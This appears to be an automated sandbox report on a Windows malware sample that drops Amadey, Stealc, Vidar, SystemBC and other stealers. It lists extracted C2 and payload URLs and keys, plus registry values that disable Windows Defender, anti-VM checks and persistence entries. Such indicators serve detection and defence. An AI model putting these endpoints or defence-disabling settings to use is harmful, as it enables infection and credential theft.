Analysis
-
max time kernel
140s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20250217-en -
resource tags
arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system -
submitted
06/03/2025, 01:16
Static task
static1
Behavioral task
behavioral1
Sample
8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c.exe
Resource
win10v2004-20250217-en
General
-
Target
8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c.exe
-
Size
938KB
-
MD5
100bd6bacfe8cde2b3d01379c45e9282
-
SHA1
5af8a1c8556ee19da4a43d1c9a5fced8960fb751
-
SHA256
8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c
-
SHA512
b6e02ef0adde68a5dcbd707c8bbb4dd0ff705c48b53cc5b4d1ff4a6eec772668a2c80ee1a61bd6d9906a8ab9412ea7904d293281de4ad3afff5b782e444600ef
-
SSDEEP
24576:VqDEvCTbMWu7rQYlBQcBiT6rprG8aylF:VTvC/MTQYxsWR7ayl
Malware Config
Extracted
http://185.215.113.16/mine/random.exe
Extracted
http://176.113.115.7/mine/random.exe
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
stealc
trump
http://45.93.20.28
-
url_path
/85a1cacf11314eb8.php
Extracted
systembc
towerbingobongoboom.com
62.60.226.86
-
dns
5.132.191.104
Extracted
vidar
ir7am
https://t.me/l793oy
https://steamcommunity.com/profiles/76561199829660832
-
user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0
Extracted
litehttp
v1.0.9
http://185.208.156.162/page.php
-
key
v1d6kd29g85cm8jp4pv8tvflvg303gbl
Signatures
-
Amadey family
-
Detect Vidar Stealer 2 IoCs
resource yara_rule behavioral2/memory/1900-1292-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/1900-1291-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 -
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral2/memory/3740-826-0x00000000009E0000-0x0000000000E2E000-memory.dmp healer behavioral2/memory/3740-827-0x00000000009E0000-0x0000000000E2E000-memory.dmp healer behavioral2/memory/3740-945-0x00000000009E0000-0x0000000000E2E000-memory.dmp healer -
Gcleaner family
-
Healer family
-
Litehttp family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" 972bad5e2c.exe -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" 972bad5e2c.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" 972bad5e2c.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" 972bad5e2c.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" 972bad5e2c.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection 972bad5e2c.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" 972bad5e2c.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 972bad5e2c.exe -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications 972bad5e2c.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" 972bad5e2c.exe -
Stealc family
-
StormKitty
StormKitty is an open source info stealer written in C#.
-
StormKitty payload 2 IoCs
resource yara_rule behavioral2/files/0x0009000000023c90-74.dat family_stormkitty behavioral2/memory/4412-82-0x0000000000420000-0x00000000004B4000-memory.dmp family_stormkitty -
Stormkitty family
-
Systembc family
-
Vidar family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 15 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 5a2f7a55bb.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 32376a73b4.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempKKPQ9REKQ59CO3PKOOAPGR8TAPBIRKGZ.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ cfaa592634.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 39510de4d4.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ FvbuInU.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Temp8KPPGOPIY9TNQQOPJI0SJEJBCDGVMLZP.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ QLW5JVNEJIJD4BSUTO.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 972bad5e2c.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ eefeac8dd1.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ vertualiziren.exe -
Blocklisted process makes network request 3 IoCs
flow pid Process 26 4004 powershell.exe 43 3924 powershell.exe 50 5428 powershell.exe -
pid Process 4176 powershell.exe 2372 powershell.exe 408 powershell.exe 1268 powershell.exe 4004 powershell.exe 3924 powershell.exe 5428 powershell.exe 4176 powershell.exe -
Downloads MZ/PE file 24 IoCs
flow pid Process 78 1100 BitLockerToGo.exe 221 5412 rapes.exe 221 5412 rapes.exe 221 5412 rapes.exe 221 5412 rapes.exe 221 5412 rapes.exe 221 5412 rapes.exe 221 5412 rapes.exe 43 3924 powershell.exe 50 5428 powershell.exe 112 4796 32376a73b4.exe 225 2024 Gxtuum.exe 101 2460 BitLockerToGo.exe 26 4004 powershell.exe 37 5412 rapes.exe 37 5412 rapes.exe 37 5412 rapes.exe 37 5412 rapes.exe 37 5412 rapes.exe 37 5412 rapes.exe 37 5412 rapes.exe 37 5412 rapes.exe 37 5412 rapes.exe 37 5412 rapes.exe -
.NET Reactor proctector 2 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
resource yara_rule behavioral2/files/0x0007000000023df3-1233.dat net_reactor behavioral2/memory/5728-1268-0x0000000000BC0000-0x0000000000C20000-memory.dmp net_reactor -
Checks BIOS information in registry 2 TTPs 30 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion QLW5JVNEJIJD4BSUTO.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 972bad5e2c.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 39510de4d4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 39510de4d4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 5a2f7a55bb.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion vertualiziren.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion QLW5JVNEJIJD4BSUTO.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion vertualiziren.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempKKPQ9REKQ59CO3PKOOAPGR8TAPBIRKGZ.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Temp8KPPGOPIY9TNQQOPJI0SJEJBCDGVMLZP.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 32376a73b4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion eefeac8dd1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 5a2f7a55bb.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 32376a73b4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 972bad5e2c.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion FvbuInU.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion FvbuInU.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempKKPQ9REKQ59CO3PKOOAPGR8TAPBIRKGZ.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion cfaa592634.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion eefeac8dd1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Temp8KPPGOPIY9TNQQOPJI0SJEJBCDGVMLZP.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion cfaa592634.exe -
Checks computer location settings 2 TTPs 8 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Control Panel\International\Geo\Nation nhDLtPT.exe Key value queried \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Control Panel\International\Geo\Nation BUZd3Mq.exe Key value queried \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Control Panel\International\Geo\Nation Gxtuum.exe Key value queried \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Control Panel\International\Geo\Nation TempKKPQ9REKQ59CO3PKOOAPGR8TAPBIRKGZ.EXE Key value queried \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Control Panel\International\Geo\Nation rapes.exe Key value queried \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Control Panel\International\Geo\Nation mshta.exe -
Executes dropped EXE 33 IoCs
pid Process 3316 TempKKPQ9REKQ59CO3PKOOAPGR8TAPBIRKGZ.EXE 5412 rapes.exe 2432 BUZd3Mq.exe 4412 Build.exe 3836 947ced5026.exe 3944 Temp8KPPGOPIY9TNQQOPJI0SJEJBCDGVMLZP.EXE 1632 2asf3YX.exe 692 rapes.exe 4872 483d2fa8a0d53818306efeb32d3.exe 5408 cfaa592634.exe 5848 38d8b16662.exe 2216 38d8b16662.exe 3356 38d8b16662.exe 2328 39510de4d4.exe 2428 5a2f7a55bb.exe 4796 32376a73b4.exe 5372 eefeac8dd1.exe 4988 QLW5JVNEJIJD4BSUTO.exe 2660 db46c2dee3.exe 3740 972bad5e2c.exe 3376 rapes.exe 224 2asf3YX.exe 4296 nhDLtPT.exe 2024 Gxtuum.exe 3528 vertualiziren.exe 2484 Ps7WqSx.exe 5068 FvbuInU.exe 5728 mAtJWNv.exe 1900 mAtJWNv.exe 772 ce4pMzk.exe 2356 MCxU5Fj.exe 5972 MCxU5Fj.exe 2240 MCxU5Fj.exe -
Identifies Wine through registry keys 2 TTPs 15 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine cfaa592634.exe Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine 32376a73b4.exe Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine eefeac8dd1.exe Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine FvbuInU.exe Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine QLW5JVNEJIJD4BSUTO.exe Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine 972bad5e2c.exe Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine TempKKPQ9REKQ59CO3PKOOAPGR8TAPBIRKGZ.EXE Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine Temp8KPPGOPIY9TNQQOPJI0SJEJBCDGVMLZP.EXE Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine 39510de4d4.exe Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine 5a2f7a55bb.exe Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine vertualiziren.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features 972bad5e2c.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 972bad5e2c.exe -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Build.exe Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Build.exe Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Build.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 6 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10108480121\\am_no.cmd" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\32376a73b4.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10108750101\\32376a73b4.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\eefeac8dd1.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10108760101\\eefeac8dd1.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\db46c2dee3.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10108770101\\db46c2dee3.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\972bad5e2c.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10108780101\\972bad5e2c.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\947ced5026.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10108470101\\947ced5026.exe" rapes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 40 ipinfo.io 41 ipinfo.io 44 ip-api.com -
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x0008000000023d25-137.dat autoit_exe behavioral2/files/0x000b000000023d71-480.dat autoit_exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 15 IoCs
pid Process 3316 TempKKPQ9REKQ59CO3PKOOAPGR8TAPBIRKGZ.EXE 5412 rapes.exe 3944 Temp8KPPGOPIY9TNQQOPJI0SJEJBCDGVMLZP.EXE 692 rapes.exe 4872 483d2fa8a0d53818306efeb32d3.exe 5408 cfaa592634.exe 2328 39510de4d4.exe 2428 5a2f7a55bb.exe 4796 32376a73b4.exe 5372 eefeac8dd1.exe 4988 QLW5JVNEJIJD4BSUTO.exe 3740 972bad5e2c.exe 3376 rapes.exe 3528 vertualiziren.exe 5068 FvbuInU.exe -
Suspicious use of SetThreadContext 5 IoCs
description pid Process procid_target PID 5848 set thread context of 3356 5848 38d8b16662.exe 160 PID 5408 set thread context of 1100 5408 cfaa592634.exe 163 PID 2328 set thread context of 2460 2328 39510de4d4.exe 166 PID 5728 set thread context of 1900 5728 mAtJWNv.exe 203 PID 2356 set thread context of 2240 2356 MCxU5Fj.exe 209 -
Drops file in Windows directory 3 IoCs
description ioc Process File created C:\Windows\Tasks\rapes.job TempKKPQ9REKQ59CO3PKOOAPGR8TAPBIRKGZ.EXE File created C:\Windows\Tasks\Gxtuum.job nhDLtPT.exe File created C:\Windows\Tasks\Test Task17.job vertualiziren.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
Program crash 4 IoCs
pid pid_target Process procid_target 6076 4412 WerFault.exe 108 3768 5848 WerFault.exe 158 3740 5728 WerFault.exe 202 4020 2356 WerFault.exe 207 -
System Location Discovery: System Language Discovery 1 TTPs 63 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Ps7WqSx.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language db46c2dee3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language chcp.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage db46c2dee3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MCxU5Fj.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Temp8KPPGOPIY9TNQQOPJI0SJEJBCDGVMLZP.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cfaa592634.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 38d8b16662.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language QLW5JVNEJIJD4BSUTO.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 38d8b16662.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 972bad5e2c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mAtJWNv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language eefeac8dd1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Gxtuum.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BUZd3Mq.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 947ced5026.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 32376a73b4.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language FvbuInU.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mAtJWNv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Build.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nhDLtPT.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vertualiziren.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 5a2f7a55bb.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempKKPQ9REKQ59CO3PKOOAPGR8TAPBIRKGZ.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MCxU5Fj.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language chcp.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 39510de4d4.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language db46c2dee3.exe -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 3648 cmd.exe 380 netsh.exe -
Checks processor information in registry 2 TTPs 12 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 Build.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier Build.exe Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 2asf3YX.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier 2asf3YX.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 3464 timeout.exe -
Kills process with taskkill 5 IoCs
pid Process 3160 taskkill.exe 1400 taskkill.exe 5092 taskkill.exe 4580 taskkill.exe 3636 taskkill.exe -
